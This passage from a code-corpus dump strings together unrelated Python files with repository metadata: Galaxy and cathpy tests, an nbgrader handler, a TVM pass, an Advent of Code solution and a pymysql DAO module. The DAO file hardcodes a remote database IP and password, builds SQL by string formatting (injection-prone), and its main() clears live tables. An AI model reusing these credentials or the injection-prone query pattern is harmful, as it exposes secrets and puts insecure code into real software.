self.log( "should allow update_time order_by" )
# change the oldest created to update the update_time
contents[0].name = 'zany and/or wacky'
self.app.model.context.flush()
results = self.contents_manager.contents( history, order_by=desc( 'update_time' ) )
self.assertEqual( contents[0], results[0] )
# =============================================================================
if __name__ == '__main__':
# or more generally, nosetests test_resourcemanagers.py -s -v
unittest.main()
| 52.285714 | 122 | 0.658952 |
795add50370a966d27392a6f16f18d6da45d3a9f | 3,160 | py | Python | nbgrader/server_extensions/formgrader/base.py | omelnikov/nbgrader | 66984e5732c98bd15733c027601a62fca6a46222 | [
"BSD-3-Clause"
] | 1,116 | 2015-01-20T19:22:24.000Z | 2022-03-31T22:05:10.000Z | nbgrader/server_extensions/formgrader/base.py | jld23/nbgrader | 07a38cd8ed12ab33870bdd42f0bf35aa1252b0db | [
"BSD-3-Clause"
] | 1,166 | 2015-01-08T21:50:31.000Z | 2022-03-31T05:15:01.000Z | nbgrader/server_extensions/formgrader/base.py | jld23/nbgrader | 07a38cd8ed12ab33870bdd42f0bf35aa1252b0db | [
"BSD-3-Clause"
] | 337 | 2015-02-06T01:28:00.000Z | 2022-03-29T06:52:38.000Z | import os
import json
import functools
from tornado import web
from notebook.base.handlers import IPythonHandler
from ...api import Gradebook
from ...apps.api import NbGraderAPI
class BaseHandler(IPythonHandler):
@property
def base_url(self):
return super(BaseHandler, self).base_url.rstrip("/")
@property
def db_url(self):
return self.settings['nbgrader_db_url']
@property
def url_prefix(self):
return self.settings['nbgrader_url_prefix']
@property
def coursedir(self):
return self.settings['nbgrader_coursedir']
@property
def authenticator(self):
return self.settings['nbgrader_authenticator']
@property
def gradebook(self):
gb = self.settings['nbgrader_gradebook']
if gb is None:
self.log.debug("creating gradebook")
gb = Gradebook(self.db_url, self.coursedir.course_id)
self.settings['nbgrader_gradebook'] = gb
return gb
@property
def mathjax_url(self):
return self.settings['mathjax_url']
@property
def exporter(self):
return self.settings['nbgrader_exporter']
@property
def api(self):
level = self.log.level
api = NbGraderAPI(
self.coursedir, self.authenticator, parent=self.coursedir.parent)
api.log_level = level
return api
def render(self, name, **ns):
template = self.settings['nbgrader_jinja2_env'].get_template(name)
return template.render(**ns)
def write_error(self, status_code, **kwargs):
if status_code == 500:
html = self.render(
'base_500.tpl',
base_url=self.base_url,
error_code=500)
elif status_code == 502:
html = self.render(
'base_500.tpl',
base_url=self.base_url,
error_code=502)
elif status_code == 403:
html = self.render(
'base_403.tpl',
base_url=self.base_url,
error_code=403)
else:
return super(BaseHandler, self).write_error(status_code, **kwargs)
self.write(html)
self.finish()
class BaseApiHandler(BaseHandler):
def get_json_body(self):
"""Return the body of the request as JSON data."""
if not self.request.body:
return None
body = self.request.body.strip().decode('utf-8')
try:
model = json.loads(body)
except Exception:
self.log.debug("Bad JSON: %r", body)
self.log.error("Couldn't parse JSON", exc_info=True)
raise web.HTTPError(400, 'Invalid JSON in body of request')
return model
def check_xsrf(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
_ = self.xsrf_token
return f(self, *args, **kwargs)
return wrapper
def check_notebook_dir(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
if self.settings['nbgrader_bad_setup']:
return self.write_error(500)
return f(self, *args, **kwargs)
return wrapper
| 26.554622 | 78 | 0.601899 |
795add9a8e07d6ce2f491c70297cd5f744cc080e | 10,912 | py | Python | Scrapy_zzuliacgn/tools/DAO.py | DeSireFire/zzuliacgnSyders | 0e4d6b9663771d8ddc65598bae58a5b4b8c22e88 | [
"MIT"
] | 2 | 2019-03-23T16:05:16.000Z | 2021-04-19T02:14:09.000Z | Scrapy_zzuliacgn/tools/DAO.py | DeSireFire/zzuliacgnSyders | 0e4d6b9663771d8ddc65598bae58a5b4b8c22e88 | [
"MIT"
] | null | null | null | Scrapy_zzuliacgn/tools/DAO.py | DeSireFire/zzuliacgnSyders | 0e4d6b9663771d8ddc65598bae58a5b4b8c22e88 | [
"MIT"
] | 1 | 2020-10-11T15:33:31.000Z | 2020-10-11T15:33:31.000Z | # import MySQLdb,sys,datetime
import pymysql,sys,datetime
# from zzuliACGN.settings import DATABASES
connect_dict = {
# "host":DATABASES["default"]["HOST"],
# "port":int(DATABASES["default"]["PORT"]),
# "user":DATABASES["default"]["USER"],
# "passwd":DATABASES["default"]["PASSWORD"],
# "db":DATABASES["default"]["NAME"],
# "host": '192.168.0.102',
# # "host": '192.168.37.128',
# "port": 3306,
# "user": 'zzuliACGN',
# "passwd": 'DeSireFire233notRoot',
# "db": 'zzuli_ACGN',
"host": '45.77.254.61',
"port": 3306,
"user": 'qidianTest',
"passwd": '8cSJAKZY4PkLJMyX',
"db": 'qidianTest',
}
# 创建连接对象
def connect(connect_dict):
"""
:param connect_dict: 传入连接数据库的必要信息
:return: 返回连接对象
"""
try:
# 创建连接对象
# conn = MySQLdb.connect(
# host=connect_dict["host"],
# port=connect_dict["port"],
# user=connect_dict["user"],
# passwd=connect_dict["passwd"],
# db=connect_dict["db"],
# # host=DATABASES["default"]["HOST"],
# # # port= int(DATABASES["default"]["PORT"]),
# # user= DATABASES["default"]["USER"],
# # passwd= DATABASES["default"]["PASSWORD"],
# # db= DATABASES["default"]["NAME"],
# )
conn = pymysql.connect(
connect_dict["host"],
connect_dict["user"],
connect_dict["passwd"],
connect_dict["db"],
connect_dict["port"],
charset = 'utf8'
# host=DATABASES["default"]["HOST"],
# # port= int(DATABASES["default"]["PORT"]),
# user= DATABASES["default"]["USER"],
# passwd= DATABASES["default"]["PASSWORD"],
# db= DATABASES["default"]["NAME"],
)
# conn.set_character_set('utf8')
return conn
except Exception as e:
print("FTP登陆失败,请检查主机号、用户名、密码是否正确:%s"%e)
sys.exit(0)
# 关闭数据库
def mysql_close(connect):
connect.close()
# 查询数据库版本
def mysql_version(connect):
cur = connect.cursor()
cur.execute("SELECT VERSION()")
# 使用 fetchone() 方法获取一条数据
data = cur.fetchone()
print(data)
# 查询数据库中所有表名
def tables_list(connect, db_name='zzuli_ACGN'):
"""
:param connect: 连接对象
:param db_name: 数据库名
:return: 返回嵌套的元组
"""
try:
# 使用cursor()方法获取操作游标
cur = connect.cursor()
# 使用execute方法执行SQL语句
cur.execute("SELECT TABLE_NAME,TABLE_ROWS FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s';" % (db_name))
# 使用 fetchone() 方法获取所有数据
data = cur.fetchall()
for i in data:
print(i[0])
return data
except Exception as e:
print("查询数据库中所有表名 时发生错误:%s"%e)
# 查询指定数据库中指定表的所有字段名column_name
def column_name(connect,db_name = 'zzuli_ACGN',table_name = 'ZA_Novel_novel_info'):
"""
:param connect: 连接对象
:param db_name: 数据库名
:param table_name: 表名
:return: 返回嵌套的元组
"""
try:
# 使用cursor()方法获取操作游标
cur = connect.cursor()
cur.execute(
"select column_name from information_schema.columns where table_schema='%s' and table_name='%s';"%(db_name,table_name)
)
data = cur.fetchall()
for i in data:
print(i[0])
return data
except Exception as e:
print("查询指定数据库中指定表的所有字段名 时发生错误:%s"%e)
# 插入数据
def insert_into(connect,table_name,data):
"""
:param connect: 连接对象
:param table_name: 表名
:param data: 要插入的数据,传入字典
:return:
"""
# 使用cursor()方法获取操作游标
cursor = connect.cursor()
print(data.keys())
mykeys = ",".join(data.keys())
myvalues = ",".join(['%s']*len(data))
sql = "INSERT INTO {table}({keys}) VALUES ({values})".format(table=table_name,keys=mykeys,values=myvalues)
print(sql)
try:
if cursor.execute(sql,tuple(data.values())):
print("中出成功!")
connect.commit()
except Exception as e:
print("插入数据 时发生错误:%s"%e)
connect.rollback()
# 批量插入executemany
def insert_by_many(connect,table_name,data):
# 使用cursor()方法获取操作游标
cursor = connect.cursor()
mykeys = ",".join([x[0] for x in column_name(connect,table_name = table_name)[1:]])
myvalues = ",".join(['%s'] * len([x[0] for x in column_name(connect,table_name = table_name)[1:]]))
sql = "INSERT INTO {table} ({keys}) VALUES({values})".format(table=table_name, keys=mykeys, values=myvalues)
try:
if cursor.executemany(sql, data):
print("批量中出成功!")
connect.commit()
except Exception as e:
print("批量插入executemany 时发生错误:%s" % e)
connect.rollback()
# 忽略以存在数据插入
def insert_IGNORE(connect, table_name, data):
"""
比如想往表中插入一条数据,如果表中没有该条数据才插入,如果已经存在该条数据就不插入
:param connect: 连接对象
:param table_name: 表名
:param data: 要插入的数据,传入字典
:return:
"""
# 使用cursor()方法获取操作游标
cursor = connect.cursor()
mykeys = ",".join(data.keys())
myvalues = ",".join(['%s'] * len(data))
sql = "INSERT IGNORE INTO {table}({keys}) VALUES ({values})".format(table=table_name, keys=mykeys, values=myvalues)
try:
if cursor.execute(sql, tuple(data.values())):
print("忽略中出成功!")
connect.commit()
except Exception as e:
print("忽略以存在数据插入 时发生错误:%s" % e)
connect.rollback()
# 替换方式数据插入
def replace_INTO(connect, table_name, data):
"""
:param connect: 连接对象
:param table_name: 表名
:param data: 要插入的数据,传入字典
:return:
"""
# 使用cursor()方法获取操作游标
cursor = connect.cursor()
mykeys = ",".join(data.keys())
myvalues = ",".join(['%s'] * len(data))
sql = "REPLACE INTO {table}({keys}) VALUES ({values})".format(table=table_name, keys=mykeys, values=myvalues)
# sql = "INSERT IGNORE INTO {table}({keys}) VALUES ({values})".format(table=table_name, keys=mykeys, values=myvalues)
try:
if cursor.execute(sql, tuple(data.values())):
print("替换插入成功!")
connect.commit()
except Exception as e:
print("忽略以存在数据插入 时发生错误:%s" % e)
connect.rollback()
# 数据提交
def sql_commit(connect):
connect.commit()
# 更新数据
def sql_update(connect,table_name,data):
# 必须设置字段为 PRIMARY KEY(主键) 或者 UNIQUE(唯一)
# 使用cursor()方法获取操作游标
cursor = connect.cursor()
mykeys = ",".join(data.keys())
myvalues = ",".join(['%s'] * len(data))
myUpdate = ",".join([" {key} = %s".format(key=key) for key in data])
sql = "INSERT INTO {table}({keys}) VALUES ({values}) ON DUPLICATE KEY UPDATE".format(table=table_name, keys=mykeys, values=myvalues)
sql += myUpdate
try:
if cursor.execute(sql, tuple(data.values())*2):
print("更新成功!")
connect.commit()
except Exception as e:
print("更新数据 时发生错误:%s"%e)
# 删除数据
def delete(connect,table_name,conditon):
"""
:param connect: 连接对象
:param table_name: 表名
:param conditon: 删除条件多样,直接将其当作字符串来床底,以实现删除操作(例如:“age > 20")
:return:
"""
# 使用cursor()方法获取操作游标
cursor = connect.cursor()
sql = "DELETE FROM {table} WHERE {conditon}".format(table=table_name,conditon=conditon)
print(sql)
try:
cursor.execute(sql)
connect.commit()
except Exception as e:
print("插入数据 时发生错误:%s"%e)
# 查询数据
def demand(connect,table_name,conditon):
# 使用cursor()方法获取操作游标
cursor = connect.cursor()
sql = "SELECT * FROM {table} WHERE {conditon}".format(table=table_name,conditon=conditon)
try:
cursor.execute(sql)
print("查询到数量: %s 条"%(cursor.rowcount))
row = cursor.fetchone()
while row:
print("row:",row)
row = cursor.fetchone()
except Exception as e:
print("查询数据 时发生错误:%s"%e)
# 删除表数据并重置ID
def Refresh_ID(connect,table_name):
"""
:param connect: 连接对象
:param table_name: 表名
:return:
"""
# 使用cursor()方法获取操作游标
cursor = connect.cursor()
sql1 = "DELETE FROM {table}".format(table=table_name)
sql2 = "ALTER TABLE {table} AUTO_INCREMENT = 1;".format(table=table_name)
try:
cursor.execute(sql1)
cursor.execute(sql2)
connect.commit()
except Exception as e:
print("删除表数据并重置ID 时发生错误:%s"%e)
# 测试用主函数
def main():
# 建立连接
db = connect(connect_dict)
try:
# 需要插入的数据
insert_dict = {
# 'novel_id': '1',
# 'novel_name': 'test',
# 'novel_intro': 'test',
# 'novel_headerImage': 'test',
# 'novel_worksNum': '233',
# 'novel_saveTime': datetime.date.today(),
# 'novel_updateTime': datetime.date.today(),
# 'novel_types_id': '1',
# 'novel_writer_id': '1',
"id":6,
"Type_title":"test666",
"isDelete":"0",
}
# tables_list(db)
print("*"*50)
# column_name(db,table_name="ZA_Novel_type")
print("*" * 50)
# 单条插入
# insert_into(db, "ZA_Novel_type", insert_dict)
print("*" * 50)
# 批量插入
newlist = []
# typelist = ["玄幻","奇幻","武侠","仙侠","都市","现实","军事","历史","游戏","体育","科幻","灵异","女生","轻小说",]
# typelist = ["动画","季度全集","漫画","港台漫画","日版漫画","音乐","动漫音乐","同人音乐","流行音乐","日剧","RAW","游戏","电脑游戏","电视游戏","掌机游戏","网络游戏","游戏周边","特摄","其他",]
# for i in typelist:
# temp = (i,0)
# newlist.append(temp)
# print(newlist)
# insert_by_many(db,"ZA_Novel_type",newlist)
# insert_by_many(db,"ZA_BT_rtypes",newlist)
print("*" * 50)
# 忽略以存在数据插入
# insert_IGNORE(db,"ZA_Novel_type", insert_dict)
print("*" * 50)
# 以替换数据插入
# replace_INTO(db,"ZA_Novel_type", insert_dict)
print("*" * 50)
# 数据更新
# insert_dict = {
# "id": 7,
# "Type_title":"test666",
# "isDelete":"0",
# }
# sql_update(db,"ZA_Novel_type", insert_dict)
# print("*" * 50)
# # 数据删除
# conditon = "Type_title = 'test'"
# # conditon = "REGEXP '^test';"
# delete(db,"ZA_Novel_type", conditon)
# print("*" * 50)
# # 查询数据
# conditon = "Type_title REGEXP '^test'"
# demand(db,"ZA_Novel_type", conditon)
print("*" * 50)
# # 删除表数据并重置ID
# Refresh_ID(db, "ZA_BT_rtypes")
# Refresh_ID(db, "ZA_BT_items")
# Refresh_ID(db, "ZA_Novel_detail")
# Refresh_ID(db, "ZA_Novel_info")
Refresh_ID(db, "QidianChapterItem")
Refresh_ID(db, "QidianItem")
Refresh_ID(db, "QidianWriterItem")
print("*" * 50)
# 查询
except Exception as e:
print("总函数 时发生错误:%s"%e)
finally:
db.close()
if __name__ == '__main__':
main()
# try:
# # 使用cursor()方法获取操作游标
# cursor = connect.cursor()
# cursor.execute()
# except Exception as e:
# print("插入数据 时发生错误:%s"%e)
| 29.021277 | 141 | 0.562958 |
795add9de97acb060ac955484d90adbe7221684b | 2,132 | py | Python | mdrsl/rule_generation/association_rule_mining/apyori_impl/apyori_utils.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | 3 | 2020-08-03T19:25:44.000Z | 2021-06-27T22:25:55.000Z | mdrsl/rule_generation/association_rule_mining/apyori_impl/apyori_utils.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | null | null | null | mdrsl/rule_generation/association_rule_mining/apyori_impl/apyori_utils.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | 2 | 2020-08-07T22:54:28.000Z | 2021-02-18T06:11:01.000Z | try:
from rule_generation.association_rule_mining.apyori_impl.apyori import RelationRecord
except ModuleNotFoundError:
from collections import namedtuple
# Ignore name errors because these names are namedtuples.
SupportRecord = namedtuple( # pylint: disable=C0103
'SupportRecord', ('items', 'support'))
RelationRecord = namedtuple( # pylint: disable=C0103
'RelationRecord', SupportRecord._fields + ('ordered_statistics',))
OrderedStatistic = namedtuple( # pylint: disable=C0103
'OrderedStatistic', ('items_base', 'items_add', 'confidence', 'lift',))
def print_relation_record(relation_record: RelationRecord):
"""
From http://www.zaxrosenberg.com/unofficial-apyori-documentation/
Each RelationRecord reflects all rules associated with a specific itemset (items) that has relevant rules.
Support (support), given that it’s simply a count of appearances of those items together,
is the same for any rules involving those items, and so only appears once per RelationRecord.
The ordered_statistic reflects a list of all rules that met our min_confidence and min_lift requirements
(parameterized when we called apriori() ).
Each OrderedStatistic contains the antecedent (items_base)
and consequent (items_add) for the rule, as well as the associated confidence and lift .
:param relation_record:
:return:
"""
# first index of the inner list
# Contains base item and add item=
items = relation_record.items
support = relation_record.support
print("itemset:", items)
print("support:", support)
# ordered_statistics = record.ordered_statistics[0]
print("Rules generated from itemset")
for ordered_statistic in relation_record.ordered_statistics:
antecedent = ordered_statistic.items_base
consequent = ordered_statistic.items_add
confidence = ordered_statistic.confidence
lift = ordered_statistic.lift
print("Rule: " + ",".join([str(i) for i in antecedent]) + " -> " + ",".join([str(i) for i in consequent]), ', conf:', confidence, ', lift:', lift)
| 42.64 | 154 | 0.719043 |
795aded19d26bab6fbdbd7d82b48a18c3869dd0c | 3,772 | py | Python | Day-19/sol.py | archanpatkar/advent2015 | a207283c85745055dce9a2d69c21214f1f4cefbb | [
"MIT"
] | null | null | null | Day-19/sol.py | archanpatkar/advent2015 | a207283c85745055dce9a2d69c21214f1f4cefbb | [
"MIT"
] | null | null | null | Day-19/sol.py | archanpatkar/advent2015 | a207283c85745055dce9a2d69c21214f1f4cefbb | [
"MIT"
] | null | null | null | from pprint import pprint
from functools import reduce
from itertools import *
from collections import defaultdict
# from queue import PriorityQueue
# from difflib import SequenceMatcher
from random import choice
data = open("input.txt","r").read().split("\n")
molecule = data[-1]
transforms = defaultdict(lambda: [])
reverse = {}
for p,e in [s.strip().split("=>") for s in data[:-2]]:
transforms[p.strip()].append(e.strip())
reverse[e.strip()] = p.strip()
pprint(transforms)
print(molecule)
cache = {}
def replace(molecules):
if isinstance(molecules, str):
if molecules in cache: return cache[molecules]
else: cache[molecules] = replace([molecules])
return cache[molecules]
distinct = set()
if isinstance(molecules,list):
for molecule in molecules:
if molecule in cache: distinct.update(cache[molecule])
else:
permol = set()
molecule_str = molecule
molecule = list(molecule)
for i in range(len(molecule)):
if molecule[i] in transforms:
for ch in transforms[molecule[i]]:
nm = [*molecule]
nm[i] = ch
permol.add("".join(nm))
if i+1 < len(molecule) and (molecule[i] + molecule[i+1] in transforms):
for ch in transforms[molecule[i]+molecule[i+1]]:
nm = [*molecule]
nm.pop(i)
nm.pop(i)
nm.insert(i,ch)
permol.add("".join(nm))
cache[molecule_str] = permol
distinct.update(permol)
return distinct
# part 1
print(len(replace(molecule)))
# part2
# Read some reddit hints as well as some solutions which recommended
# using randomness for substituting in reverse order to the root node
curr = molecule
steps = 0
while curr != "e":
rep,sub = choice(list(reverse.items()))
if rep in curr:
curr = curr.replace(rep,sub,1)
steps += 1
print(steps)
# A* algo for finding the molecule but takes too long to compute!
# def closeness(str,str2):
# if len(str) > len(str2): return None
# flag = True
# continous = 0
# nm = 0
# for i in range(len(str)):
# if str[i] == str2[i] and flag:
# continous += 1
# else:
# nm += 1
# flag = False
# return nm-continous
# def similar(a, b):
# return SequenceMatcher(None, a, b).ratio()
# start = "e"
# end = molecule
# current_nodes = set(["e"])
# queue = PriorityQueue()
# queue.put((0,start))
# distance = defaultdict(lambda: -1)
# distance[start] = 0
# step = 0
# len_end = len(end)
# while not queue.empty():
# print("step:",step)
# priority,current = queue.get()
# # current_nodes.remove(current)
# if current == end: break
# for next in replace(current):
# # print("next:",next)
# # print("closeness:",closeness(next,end))
# if len(next) > len_end: continue
# print("diff:",len(molecule)-len(next))
# cost = distance[current] + 1
# if (not next in distance) or cost < distance[next]:
# distance[next] = cost
# # cost +
# priority = similar(next,end) * 10
# print("priority:",-priority)
# # visited.add(next)
# # if:
# # (next not in current_nodes) and
# # if priority != None:
# # (cost + (-priority)
# queue.put((-priority,next))
# # current_nodes.add(next)
# if end in distance: break
# step += 1
# print(distance[end]) | 30.918033 | 94 | 0.541092 |
795adfc2fb1f12f817ba7ce5467156a3f2354e66 | 1,622 | py | Python | python/tvm/relay/backend/contrib/ethosu/preprocess.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 4,640 | 2017-08-17T19:22:15.000Z | 2019-11-04T15:29:46.000Z | python/tvm/relay/backend/contrib/ethosu/preprocess.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 3,022 | 2020-11-24T14:02:31.000Z | 2022-03-31T23:55:31.000Z | python/tvm/relay/backend/contrib/ethosu/preprocess.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 1,352 | 2017-08-17T19:30:38.000Z | 2019-11-04T16:09:29.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument, import-outside-toplevel
"""Set of passes to pre-process the IRModule to support Arm(R)-Ethos(TM)-U
NPU code generation. These set of passes will mutate both the main and the
external functions.
"""
import tvm # type: ignore
from . import _ffi_api # type: ignore
def preprocess_ext_io() -> tvm.transform.Pass:
"""This pass mutates the number of inputs going to / outputs coming out to/from
external functions to one. This is achieved via concatenation
of inputs and splitting of outputs in around the call to the external function.
Returns
-------
ret : tvm.transform.Pass
The registered pass to mutate the IO of the external functions and their calls.
"""
return _ffi_api.PreprocessExternalFuncIO() # type: ignore # pylint: disable=no-member
| 43.837838 | 90 | 0.751541 |
795adfca4c63aa2eb9d1ede5987e4d38cb030f2a | 8,248 | py | Python | tests/util_test.py | shouldsee/cathpy | 5f7fa1322434b2d254f0158c5840f029b12dbafe | [
"MIT"
] | null | null | null | tests/util_test.py | shouldsee/cathpy | 5f7fa1322434b2d254f0158c5840f029b12dbafe | [
"MIT"
] | null | null | null | tests/util_test.py | shouldsee/cathpy | 5f7fa1322434b2d254f0158c5840f029b12dbafe | [
"MIT"
] | null | null | null | import logging
import difflib
import os
import tempfile
from cathpy.core import error as err
from cathpy.core.util import (StructuralClusterMerger,
AlignmentSummaryRunner, GroupsimRunner, GroupsimResult, )
from cathpy.core.datafiles import ReleaseDir
from cathpy.core.align import Align
from cathpy.core import util
from .testutils import TestBase, log_title, log_level
LOG = logging.getLogger(__name__)
class TestUtil(TestBase):
def setUp(self):
self.cath_version = 'v4.2'
self.data_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'data')
self.sc_file = os.path.join(self.data_dir,
'1.10.8.10__FF_SSG9__6.aln_reps.cora.fa')
self.ff_dir = os.path.join(self.data_dir, 'funfams')
self.ff_file = os.path.join(
self.ff_dir, '1.10.8.10-ff-14534.reduced.sto')
self.ff_tmpl = '__SFAM__-ff-__FF_NUM__.reduced.sto'
self.merge_sto_file = os.path.join(self.data_dir, 'merge.sto')
self.example_fasta_file = self.sc_file
self.example_sto_file = self.ff_file
self.cath_release = ReleaseDir(
self.cath_version, base_dir=self.data_dir)
def test_alignment_summary_file(self):
runner = AlignmentSummaryRunner(
aln_file=self.merge_sto_file)
entries = runner.run()
self.assertEqual(len(entries), 1)
summary = entries[0]
self.assertEqual(summary.aln_length, 92)
self.assertEqual(summary.dops, 88.422)
self.assertEqual(summary.gap_count, 25228)
self.assertEqual(summary.total_positions, 64492)
self.assertEqual(summary.seq_count, 701)
self.assertEqual(round(summary.gap_per, 2), round(39.12, 2))
def test_alignment_summary_dir(self):
runner = AlignmentSummaryRunner(
aln_dir=self.data_dir, suffix='.sto')
entries = runner.run()
self.assertEqual(len(entries), 3)
runner = AlignmentSummaryRunner(
aln_dir=self.data_dir, suffix='.sto', recursive=True)
entries = runner.run()
self.assertEqual(len(entries), 7)
@log_title
def test_merge(self):
tmp_fasta_file = tempfile.NamedTemporaryFile(
mode='w+', suffix='.fa', delete=True)
tmp_sto_file = tempfile.NamedTemporaryFile(
mode='w+', suffix='.sto', delete=False)
LOG.info("Creating SC merger...")
merger = StructuralClusterMerger(cath_version=self.cath_version,
sc_file=self.sc_file,
out_sto=tmp_sto_file.name,
out_fasta=tmp_fasta_file.name,
ff_dir=self.ff_dir,
ff_tmpl=self.ff_tmpl,
cath_release=self.cath_release)
LOG.info("Merging SC alignment {}".format(self.sc_file))
merge_aln = merger.run()
self.assertEqual(merge_aln.count_sequences, 701)
with open(tmp_sto_file.name) as f:
sto_got = f.read()
with open(self.merge_sto_file) as f:
sto_expected = f.read()
LOG.info("Checking {} versus {}".format(
tmp_sto_file.name, self.merge_sto_file))
self.assertMultiLineEqual(sto_got, sto_expected)
def test_funfam_file_finder(self):
finder = util.FunfamFileFinder(
base_dir=self.ff_dir, ff_tmpl='__SFAM__-ff-__FF_NUM__.reduced.sto')
self.assertIsInstance(finder, util.FunfamFileFinder)
ff_file = finder.search_by_domain_id('2damA00')
self.assertEqual(os.path.basename(ff_file),
'1.10.8.10-ff-14534.reduced.sto')
with self.assertRaises(err.NoMatchesError):
finder.search_by_domain_id('1zzzA01')
with self.assertRaises(err.InvalidInputError):
finder.search_by_domain_id('bingo')
with self.assertRaises(err.InvalidInputError):
finder.search_by_domain_id(' file with &*! characters and spaces ')
def test_ff_id_from_file(self):
finder = util.FunfamFileFinder(
base_dir=self.ff_dir, ff_tmpl='__SFAM__-ff-__FF_NUM__.reduced.sto')
ff_file = finder.search_by_domain_id('2damA00')
ff_id = finder.funfam_id_from_file(ff_file)
self.assertEqual(ff_id.sfam_id, '1.10.8.10')
self.assertEqual(ff_id.cluster_num, 14534)
@log_level('cathpy.core.util', 'DEBUG')
def test_scorecons(self):
sc = util.ScoreconsRunner()
aln = Align.from_fasta(self.example_fasta_file)
sc_res = sc.run_fasta(self.example_fasta_file)
self.assertEqual(sc_res.dops, 92.889)
self.assertEqual(len(sc_res.scores), aln.aln_positions)
del aln
aln = Align.from_stockholm(self.example_sto_file)
sc_res = sc.run_stockholm(self.example_sto_file)
self.assertEqual(sc_res.dops, 61.529)
self.assertEqual(len(sc_res.scores), aln.aln_positions)
def test_groupsim(self):
gs = util.GroupsimRunner()
aln = Align.from_fasta(self.example_fasta_file)
seqs = aln.seqs
for s in seqs[:2]:
s.set_cluster_id('0001')
for s in seqs[2:]:
s.set_cluster_id('0002')
gs_res = gs.run_alignment(aln)
self.assertEqual(gs_res.count_positions, aln.aln_positions)
LOG.info("GS: {}".format(repr(gs_res.__dict__)))
sto_file = tempfile.NamedTemporaryFile(delete=False, suffix='.sto')
sto_with_groupsim_file = tempfile.NamedTemporaryFile(delete=False,
suffix='.groupsim.sto')
LOG.info("Writing STOCKHOLM file (without groupsim): %s", sto_file.name)
aln.write_sto(sto_file.name)
LOG.info("Adding groupsim data ... ")
aln.add_groupsim()
LOG.info("Writing STOCKHOLM file (with groupsim): %s",
sto_with_groupsim_file.name)
aln.write_sto(sto_with_groupsim_file.name)
with open(sto_file.name) as f1:
with open(sto_with_groupsim_file.name) as f2:
lines1 = f1.readlines()
lines2 = f2.readlines()
ndiff = difflib.ndiff(lines1, lines2)
difflines = [l for l in ndiff if not l.startswith(' ')]
LOG.info("DIFF: %s", ''.join(difflines))
expected_groupsim = '#=GC groupsim --------------10014101040141141031--2151411010022021221001040000---0-1-10-----\n'
self.assertEqual(''.join(difflines), '+ ' + expected_groupsim)
def test_groupsim_runner(self):
aln = Align.from_fasta(self.example_fasta_file)
# need to set the cluster id on sequences
runner = GroupsimRunner()
with self.assertRaises(err.InvalidInputError):
runner.run_alignment(aln)
for seq_idx, seq in enumerate(aln.sequences):
seq.set_cluster_id('cluster1' if seq_idx < 5 else 'cluster2')
result = runner.run_alignment(aln)
self.assertIsInstance(result, GroupsimResult)
def test_cluster_file(self):
sc_path = os.path.abspath(self.sc_file)
sc_dir = os.path.dirname(sc_path)
sc_file = util.ClusterFile(sc_path)
# 1.10.8.10__FF_SSG9__6.aln_reps.cora.fa
self.assertDictEqual(sc_file.__dict__, {
'path': sc_dir,
'sfam_id': '1.10.8.10',
'cluster_type': 'FF_SSG9',
'cluster_num': '6',
'desc': '.aln_reps.cora',
'suffix': '.fa',
'join_char': '__',
})
self.assertEqual(sc_file.to_string(), sc_path)
ff_path = os.path.abspath(self.ff_file)
ff_dir = os.path.dirname(ff_path)
ff_file = util.ClusterFile(ff_path)
# 1.10.8.10-ff-14534.reduced.sto
self.assertDictEqual(ff_file.__dict__, {
'path': ff_dir,
'sfam_id': '1.10.8.10',
'cluster_type': 'ff',
'cluster_num': '14534',
'desc': '.reduced',
'suffix': '.sto',
'join_char': '-',
})
self.assertEqual(ff_file.to_string(), ff_path)
| 39.090047 | 140 | 0.610936 |
795ae046d60759c0cb5facdcd67c5cab72cb4a57 | 315 | py | Python | fa_bot.py | darkChozo/folkbot | 64c1c59654b9d6af4b4fc41f0f48c65e1ea3e8b2 | [
"MIT"
] | null | null | null | fa_bot.py | darkChozo/folkbot | 64c1c59654b9d6af4b4fc41f0f48c65e1ea3e8b2 | [
"MIT"
] | null | null | null | fa_bot.py | darkChozo/folkbot | 64c1c59654b9d6af4b4fc41f0f48c65e1ea3e8b2 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python
import bot
import logging
# Full sail ahoy!
if __name__ == '__main__':
fa_bot = bot.FAbot.FAbot("config.ini")
try:
fa_bot.start()
except KeyboardInterrupt:
print "Disconnecting..."
logging.info("Keyboard interrupt. Disconnecting.")
fa_bot.stop()
| 22.5 | 58 | 0.644444 |
795ae05a8c000b4fc270b7aff08457fd4ef6094f | 2,183 | py | Python | saleor/product/__init__.py | elwoodxblues/saleor | 5e4e4a4259a011d24b04ebd24c77c689de843fa1 | [
"CC-BY-4.0"
] | 19 | 2019-12-03T17:28:07.000Z | 2021-09-10T21:30:52.000Z | saleor/product/__init__.py | elwoodxblues/saleor | 5e4e4a4259a011d24b04ebd24c77c689de843fa1 | [
"CC-BY-4.0"
] | 32 | 2019-12-16T11:18:35.000Z | 2021-03-19T03:33:15.000Z | saleor/product/__init__.py | elwoodxblues/saleor | 5e4e4a4259a011d24b04ebd24c77c689de843fa1 | [
"CC-BY-4.0"
